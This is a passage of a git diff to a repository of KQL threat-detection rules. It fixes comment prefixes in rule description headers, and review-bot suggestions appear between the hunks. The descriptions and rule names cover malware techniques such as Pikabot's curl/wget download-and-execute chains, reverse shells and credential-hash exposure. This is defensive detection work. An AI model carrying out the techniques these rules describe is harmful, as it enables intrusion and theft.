...ious_shellexec_rundll_call_via_ordinal.kql | 3 +-- ...us_speech_runtime_binary_child_process.kql | 3 +-- ...indows_defender_feature_via_powershell.kql | 1 - ...ous_volume_shadow_copy_vss_ps_dll_load.kql | 5 ++-- ...der_registry_key_tampering_via_reg_exe.kql | 1 - .../suspicious_windows_service_tampering.kql | 1 - ...ous_windows_update_agent_empty_cmdline.kql | 1 - ...uspicious_wordpad_outbound_connections.kql | 3 +-- ...earing_or_removal_via_system_utilities.kql | 1 - .../sysmon_driver_altitude_change.kql | 3 +-- ...system_file_execution_location_anomaly.kql | 1 - ...information_discovery_via_sysctl_macos.kql | 3 +-- .../taskkill_symantec_endpoint_protection.kql | 5 ++-- ...on_addinutil_exe_commandline_execution.kql | 1 - ...ncommon_child_process_of_addinutil_exe.kql | 1 - 
.../uncommon_child_process_of_appvlp_exe.kql | 7 +++--- .../uncommon_child_process_of_setres_exe.kql | 5 ++-- ...eyboard_layout_ime_file_registry_value.kql | 5 ++-- ..._file_creation_by_mysql_daemon_process.kql | 3 +-- ..._filesystem_load_attempt_by_format_com.kql | 1 - .../uncommon_link_exe_parent_process.kql | 9 ++++--- .../uncommon_outbound_kerberos_connection.kql | 1 - .../uncommon_sigverif_exe_child_process.kql | 1 - .../weak_or_abused_passwords_in_cli.kql | 3 +-- .../wfp_filter_added_via_registry.kql | 1 - .../windows_defender_context_menu_removed.kql | 5 ++-- ...ndows_defender_exclusion_list_modified.kql | 1 - ...hreat_severity_default_action_modified.kql | 5 ++-- ...exe_uncommon_argument_or_child_process.kql | 3 +-- .../write_protect_for_storage_disabled.kql | 3 +-- ...mon_locations_via_presentationhost_exe.kql | 1 - .../xsl_script_execution_via_wmic_exe.kql | 5 ++-- ..._monitoring_agent_registry_keys_access.kql | 3 +-- ...th_service_agents_registry_keys_access.kql | 7 +++--- .../file_and_directory_discovery_linux.kql | 1 - ..._subfolder_enumeration_via_dir_command.kql | 1 - ...ing_explorer_folder_shortcut_via_shell.kql | 1 - .../Discovery/hacktool_certipy_execution.kql | 1 - .../hacktool_soaphound_execution.kql | 1 - ...cal_groups_reconnaissance_via_wmic_exe.kql | 7 +++--- .../Discovery/network_sniffing_macos.kql | 3 +-- .../os_architecture_discovery_via_grep.kql | 1 - ...scan_binary_data_transmission_activity.kql | 3 +-- .../Discovery/pua_adidnsdump_execution.kql | 3 +-- .../pua_softperfect_netscan_execution.kql | 3 +-- .../Discovery/pua_trufflehog_execution.kql | 5 ++-- .../pua_trufflehog_execution_linux.kql | 5 ++-- ...on_command_output_piped_to_findstr_exe.kql | 3 +-- ...y_tools_keyword_lookup_via_findstr_exe.kql | 3 +-- .../Discovery/shell_execution_gcc_linux.kql | 1 - .../shell_execution_via_find_linux.kql | 1 - .../shell_execution_via_flock_linux.kql | 1 - .../shell_execution_via_nice_linux.kql | 1 - .../shell_invocation_via_apt_linux.kql | 3 +-- 
..._reconnaissance_activity_using_net_exe.kql | 3 +-- .../Discovery/suspicious_where_execution.kql | 5 ++-- ...stem_information_discovery_using_ioreg.kql | 5 ++-- ...mation_discovery_using_system_profiler.kql | 3 +-- ...stem_integrity_protection_sip_disabled.kql | 1 - ...m_integrity_protection_sip_enumeration.kql | 1 - ...ction_to_active_directory_web_services.kql | 1 - ...tem_information_discovery_via_wmic_exe.kql | 7 +++--- .../Discovery/vim_gtfobin_abuse_linux.kql | 3 +-- ...sembly_dll_creation_via_aspnetcompiler.kql | 1 - ..._exe_from_potentially_suspicious_paths.kql | 1 - .../capsh_shell_invocation_linux.kql | 1 - ...ing_space_characters_execution_anomaly.kql | 3 +-- ...t_potentially_suspicious_child_process.kql | 3 +-- ...ta_export_from_mssql_table_via_bcp_exe.kql | 3 +-- ..._of_powershell_execution_via_sqlps_exe.kql | 3 +-- ...nternals_suspicious_powershell_cmdlets.kql | 3 +-- ...process_from_browser_file_upload_abuse.kql | 5 ++-- .../Execution/forfiles_command_execution.kql | 5 ++-- .../fsutil_behavior_set_symlinkevaluation.kql | 3 +-- ...hacktool_sharpwsus_wsuspendu_execution.kql | 3 +-- ...mputer_zone_for_http_protocols_via_cli.kql | 1 - ...tion_spawn_shell_via_os_system_library.kql | 1 - .../installation_of_wsl_kali_linux.kql | 3 +-- KQL/rules/Execution/jamf_mdm_execution.kql | 1 - ...security_stopped_via_commandline_linux.kql | 3 +-- .../mmc_loading_script_engines_dlls.kql | 3 +-- .../nodejs_execution_of_javascript_file.kql | 7 +++--- ...ted_network_connection_to_non_local_ip.kql | 5 ++-- ...nnection_initiated_by_microsoft_dialer.kql | 5 ++-- ...arbitrary_file_download_via_cmdl32_exe.kql | 5 ++-- ...inary_impersonating_sysinternals_tools.kql | 5 ++-- ...al_clickfix_execution_pattern_registry.kql | 7 +++--- ...tial_dll_injection_via_acccheckconsole.kql | 5 ++-- ..._spoofing_using_right_to_left_override.kql | 1 - .../Execution/potential_php_reverse_shell.kql | 3 +-- ...duct_class_reconnaissance_via_wmic_exe.kql | 5 ++-- 
...er_launch_from_document_reader_process.kql | 1 - ...d_executed_via_run_dialog_box_registry.kql | 3 +-- ...e_dll_loaded_by_non_powershell_process.kql | 3 +-- ...dowsinstaller_com_from_remote_location.kql | 7 +++--- ...l_execution_via_pty_and_socket_modules.kql | 1 - ...hon_spawning_pretty_tty_via_pty_module.kql | 1 - ...with_known_revoked_signing_certificate.kql | 7 +++--- ...cess_tool_screenconnect_temporary_file.kql | 3 +-- .../service_reconnaissance_via_wmic_exe.kql | 7 +++--- .../shell_execution_via_git_linux.kql | 1 - .../shell_execution_via_rsync_linux.kql | 1 - ...shell_invocation_via_env_command_linux.kql | 1 - .../shell_invocation_via_ssh_linux.kql | 1 - ...ent_tools_powershell_session_detection.kql | 3 +-- ...s_deno_file_written_from_remote_source.kql | 3 +-- ...load_and_execute_pattern_via_curl_wget.kql | 7 +++--- ...s_electron_application_child_processes.kql | 1 - ...th_whitespace_padding_clickfix_filefix.kql | 5 ++-- ...ious_invocation_of_shell_via_awk_linux.kql | 3 +-- ...spicious_invocation_of_shell_via_rsync.kql | 1 - ...cters_in_runmru_registry_path_clickfix.kql | 1 - ...rs_in_typedpaths_registry_path_filefix.kql | 1 - ...and_volume_reconnaissance_via_wmic_exe.kql | 5 ++-- .../Execution/use_of_fsharp_interpreters.kql | 3 +-- ...process_located_in_suspicious_location.kql | 3 +-- ..._download_via_configsecuritypolicy_exe.kql | 5 ++-- ...n_to_ngrok_tunneling_service_initiated.kql | 5 ++-- ...nnection_initiated_to_btunnels_domains.kql | 3 +-- ...itiated_to_cloudflared_tunnels_domains.kql | 3 +-- ...nection_initiated_to_devtunnels_domain.kql | 1 - ...etwork_connection_initiated_to_mega_nz.kql | 3 +-- ...d_to_visual_studio_code_tunnels_domain.kql | 1 - ...ted_network_connection_to_ngrok_domain.kql | 5 ++-- .../pua_restic_backup_tool_execution.kql | 5 ++-- .../python_webserver_execution_linux.kql | 5 ++-- .../suspicious_outbound_smtp_connections.kql | 3 +-- ...bdav_client_execution_via_rundll32_exe.kql | 1 - ...bdav_client_execution_via_rundll32_exe.kql 
| 3 +-- .../all_backups_deleted_via_wbadmin_exe.kql | 5 ++-- ...eleted_data_overwritten_via_cipher_exe.kql | 5 ++-- ...e_recovery_from_backup_via_wbadmin_exe.kql | 3 +-- ...f_rstrtmgr_dll_by_a_suspicious_process.kql | 5 ++-- ...of_rstrtmgr_dll_by_an_uncommon_process.kql | 5 ++-- ...added_to_time_machine_via_tmutil_macos.kql | 3 +-- ...e_access_via_volume_shadow_copy_backup.kql | 1 - ...ckup_deletion_attempt_via_tmutil_macos.kql | 3 +-- ...chine_backup_disabled_via_tmutil_macos.kql | 3 +-- ...windows_backup_deleted_via_wbadmin_exe.kql | 5 ++-- ...very_environment_disabled_via_reagentc.kql | 5 ++-- ..._image_mount_indicator_in_recent_files.kql | 3 +-- .../office_macro_file_download.kql | 3 +-- ...created_in_outlook_temporary_directory.kql | 3 +-- ..._write_to_sharepoint_layouts_directory.kql | 3 +-- ...ine_padding_with_whitespace_characters.kql | 7 +++--- .../hacktool_sharpmove_tool_execution.kql | 1 - ...top_connection_initiated_via_mstsc_exe.kql | 3 +-- ...dp_connections_over_non_standard_tools.kql | 3 +-- ...eral_movement_via_activatemicrosoftapp.kql | 1 - ...eral_movement_via_windows_remote_shell.kql | 1 - .../winrs_local_command_execution.kql | 3 +-- ..._hijackig_via_additional_space_in_path.kql | 3 +-- .../dns_over_https_enabled_by_registry.kql | 5 ++-- .../Persistence/enable_lm_hash_storage.kql | 3 +-- .../enable_lm_hash_storage_proccreation.kql | 3 +-- .../hacktool_powerup_write_hijack_dll.kql | 5 ++-- ...ropped_in_the_teams_or_onedrive_folder.kql | 3 +-- ...sk_system_power_settings_via_systemctl.kql | 5 ++-- .../monitoring_for_persistence_via_bits.kql | 7 +++--- ...enassemblyusagelog_registry_key_tamper.kql | 5 ++-- ...ders_registered_with_uncommon_dll_name.kql | 5 ++-- ...tence_via_disk_cleanup_handler_autorun.kql | 11 ++++----- .../persistence_via_sticky_key_backdoor.kql | 3 +-- .../potential_azure_browser_sso_abuse.kql | 3 +-- ...tstrike_service_installations_registry.kql | 1 - ...rsistence_attempt_via_errorhandler_cmd.kql | 3 +-- 
...ence_via_disk_cleanup_handler_registry.kql | 11 ++++----- ...tential_persistence_via_lsa_extensions.kql | 3 +-- ...m_database_persistence_via_sdbinst_exe.kql | 3 +-- ...esktop_background_change_using_reg_exe.kql | 3 +-- ...desktop_background_change_via_registry.kql | 3 +-- ...picious_malware_callback_communication.kql | 1 - ...s_malware_callback_communication_linux.kql | 1 - ...er_creation_by_non_sysinternals_binary.kql | 3 +-- .../register_new_ifiltre_for_persistence.kql | 3 +-- ...gistry_manipulation_via_wmi_stdregprov.kql | 5 ++-- ...ccess_tool_anydesk_incoming_connection.kql | 1 - ...m_viewer_session_started_on_linux_host.kql | 3 +-- ...m_viewer_session_started_on_macos_host.kql | 3 +-- ...viewer_session_started_on_windows_host.kql | 3 +-- ..._potential_com_hijacking_registry_keys.kql | 3 +-- ...ctedadminmode_registry_value_tampering.kql | 5 ++-- ..._registry_value_tampering_proccreation.kql | 5 ++-- ...sabled_via_minint_registry_key_process.kql | 5 ++-- ...d_via_minint_registry_key_registry_set.kql | 5 ++-- KQL/rules/Persistence/servicedll_hijack.kql | 3 +-- .../startup_item_file_created_macos.kql | 5 ++-- ...s_file_write_to_webapps_root_directory.kql | 3 +-- ...spicious_process_by_web_server_process.kql | 1 - ...uspicious_screensave_change_by_reg_exe.kql | 3 +-- .../suspicious_vboxdrvinst_exe_parameters.kql | 5 ++-- ..._bypass_via_windows_directory_spoofing.kql | 3 +-- ..._database_installation_via_sdbinst_exe.kql | 3 +-- ...digest_credguard_registry_modification.kql | 5 ++-- .../webshell_hacking_activity_patterns.kql | 1 - .../webshell_tool_reconnaissance_activity.kql | 1 - ...inlogon_allowmultipletssessions_enable.kql | 5 ++-- ...d_port_monitor_persistence_in_registry.kql | 3 +-- .../bypass_uac_using_silentcleanup_task.kql | 5 ++-- ...le_association_to_executable_via_assoc.kql | 3 +-- ...nge_default_file_association_via_assoc.kql | 3 +-- ...ng_service_imagepath_value_via_reg_exe.kql | 5 ++-- ...ion_exe_for_service_with_unquoted_path.kql | 3 +-- 
..._rdp_port_changed_to_non_standard_port.kql | 5 ++-- .../hacktool_hollowreaper_execution.kql | 3 +-- .../hacktool_sharpdpapi_execution.kql | 3 +-- ...or_privilege_escalation_tool_execution.kql | 3 +-- .../linux_sudo_chroot_execution.kql | 7 +++--- ...k_connection_initiated_via_notepad_exe.kql | 5 ++-- .../new_custom_shim_database_created.kql | 3 +-- ..._registered_from_a_suspicious_location.kql | 1 - .../password_set_to_never_expire_via_wmi.kql | 1 - ...dll_sideloading_via_deviceenroller_exe.kql | 3 +-- ...istence_via_app_paths_default_property.kql | 7 +++--- ...via_appcompat_registerapprestart_layer.kql | 5 ++-- ..._via_microsoft_compatibility_appraiser.kql | 3 +-- ...ntial_persistence_via_netsh_helper_dll.kql | 1 - ...sistence_via_netsh_helper_dll_registry.kql | 1 - ...istence_via_shim_database_modification.kql | 3 +-- ...sistence_attempt_via_windows_telemetry.kql | 7 +++--- ...ential_ripzip_attack_on_startup_folder.kql | 5 ++-- ...hortcut_persistence_via_powershell_exe.kql | 7 +++--- ...th_curl_and_powershell_execution_combo.kql | 3 +-- .../scheduled_task_job_at.kql | 3 +-- ...rovider_ssp_added_to_lsa_configuration.kql | 1 - ...p16_exe_execution_with_custom_lst_file.kql | 5 ++-- ...ious_autorun_registry_modified_via_wmi.kql | 1 - .../suspicious_get_variable_exe_creation.kql | 5 ++-- ...icious_modification_of_scheduled_tasks.kql | 5 ++-- ...cious_screensaver_binary_file_creation.kql | 3 +-- .../suspicious_startup_folder_persistence.kql | 5 ++-- .../tasks_folder_evasion.kql | 5 ++-- .../Privilege Escalation/uac_disabled.kql | 1 - .../uac_notification_disabled.kql | 5 ++-- .../uac_secure_desktop_prompt_disabled.kql | 5 ++-- ...vent_log_access_tampering_via_registry.kql | 1 - .../winlogon_notify_key_logon_persistence.kql | 3 +-- ...ar_creating_files_in_startup_locations.kql | 3 +-- .../writing_local_admin_share.kql | 3 +-- ...xe_execution_from_non_default_location.kql | 3 +-- ...ion_from_potentially_suspicious_parent.kql | 1 - 
 .../vhd_image_download_via_browser.kql | 3 +--
 helper.py | 12 +++++++++-
 562 files changed, 668 insertions(+), 1233 deletions(-)
diff --git a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
index bb9424a1..2aede8b8 100644
--- a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
+++ b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
@@ -3,10 +3,9 @@
 // Date: 2023-10-15
 // Level: medium
 // Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.
-This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs
-process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other
-processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
-
+// This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs
+// process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other
+// processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql
index 0a5e25ac..2fdaa157 100644
--- a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql
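Review bot: The re-prefixed line `+// processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.` carries over the typo from the old text; since the line is rewritten anyway, make it `// processes constitute non-standard and suspicious ways to retrieve the Autoit3 executable.`. The same defect — description continuation lines that lack the `//` prefix and would therefore be handed to the query parser as KQL rather than treated as comments — is fixed identically in the following hunks of this chunk (potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql through cve_2021_26858_exchange_exploitation.kql), so this note covers them. Presumably these headers come from converting multi-line Sigma description fields; the diffstat lists helper.py as changed in this commit, and if that script writes the headers it should prefix every description line itself, otherwise the remaining rule files in the diffstat need the same hand edit and newly converted rules will regress. Consider also a check in the converter (or in CI) that every line before the first query statement starts with `//`.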
+++ b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql
@@ -3,7 +3,6 @@
 // Date: 2024-06-22
 // Level: high
 // Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
-
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
index e47bc5f3..b15a1eeb 100644
--- a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
+++ b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
@@ -3,9 +3,8 @@
 // Date: 2025-06-13
 // Level: high
 // Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053
-by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from
-attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc.
-
+// by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from
+// attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql
index 80fa7bfe..d3f51ba4 100644
--- a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql
+++ b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql
@@ -3,8 +3,7 @@
 // Date: 2023-10-27
 // Level: high
 // Description: Detects the execution of rundll32 that leads to an external network connection.
-The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
-
+// The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1573, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
index 03825d48..83b98d03 100644
--- a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
+++ b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
@@ -3,8 +3,7 @@
 // Date: 2025-04-20
 // Level: medium
 // Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction.
-If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker.
-
+// If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker.
 // MITRE Tactic: Credential Access
 // Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql
index 692bb84b..9993a698 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql
@@ -3,7 +3,6 @@
 // Date: 2023-10-24
 // Level: high
 // Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql
index 7a0c8949..4f3041d9 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql
@@ -3,8 +3,7 @@
 // Date: 2020-06-09
 // Level: critical
 // Description: Detects FlowCloud malware registry markers from threat group TA410.
-The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
-
+// The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql
index 60558d63..e188b769 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql
@@ -3,8 +3,7 @@
 // Date: 2024-04-23
 // Level: high
 // Description: Detects the creation of specific files inside of ProgramData directory.
-These files were seen being created by Forest Blizzard as described by MSFT.
-
+// These files were seen being created by Forest Blizzard as described by MSFT.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql
index 14293f5b..cad7ef5f 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql
@@ -3,8 +3,7 @@
 // Date: 2024-04-23
 // Level: medium
 // Description: Detects the creation of JavaScript files inside of the DriverStore directory.
-Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
-
+// Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
 // False Positives:
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql
index 4ffc2e1e..f57c76cd 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql
@@ -3,8 +3,7 @@
 // Date: 2024-04-23
 // Level: high
 // Description: Detects the execution of specific processes and command line combination.
-These were seen being created by Forest Blizzard as described by MSFT.
-
+// These were seen being created by Forest Blizzard as described by MSFT.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql
index a98cb4ca..6a337236 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2024-07-03
 // Level: high
 // Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
index 9e970a18..e89e99dc 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2024-01-26
 // Level: high
 // Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql
index 25babf40..83db92ba 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-03
 // Level: high
 // Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges.
-The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
-
+// The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
index 28666930..b9c6973f 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
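Review bot: The re-prefixed line `+// The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.` is a sentence fragment with no main verb, inherited from the old text; since the line is being rewritten anyway, make it `// The file name is typically 5-6 characters long, a random combination of consonants and vowels, followed by a ".wll" extension so that it poses as a legitimate file and evades detection.`. The preceding description line has the same kind of slip (`a file that is decrypted backdoor binary` should read `a file that is the decrypted backdoor binary`), but it is a context line here, so that is a separate edit.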
@@ -3,9 +3,8 @@
 // Date: 2024-01-02
 // Level: medium
 // Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
-Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
-In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
-
+// Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
+// In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql
index 783e71f2..d34b78ea 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql
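Review bot: The first re-prefixed line, `+// Commands such as "curl", "wget" in order to download extra payloads. ...`, is a fragment carried over from the old text; since the line is rewritten anyway, `// Commands such as "curl" and "wget" are used to download extra payloads.` keeps the meaning and is grammatical. In the second added line the subject is singular, so `a combination of the commands described above are used` should read `a combination of the commands described above is used`.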
@@ -3,8 +3,7 @@
 // Date: 2024-03-07
 // Level: high
 // Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function.
-This behavior was observed in multiple Raspberry-Robin variants.
-
+// This behavior was observed in multiple Raspberry-Robin variants.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql
index 59bab07f..df9b7bc2 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql
@@ -3,7 +3,6 @@
 // Date: 2024-02-23
 // Level: high
 // Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, detection.emerging-threats
diff --git a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql
index a858f485..ae88791b 100644
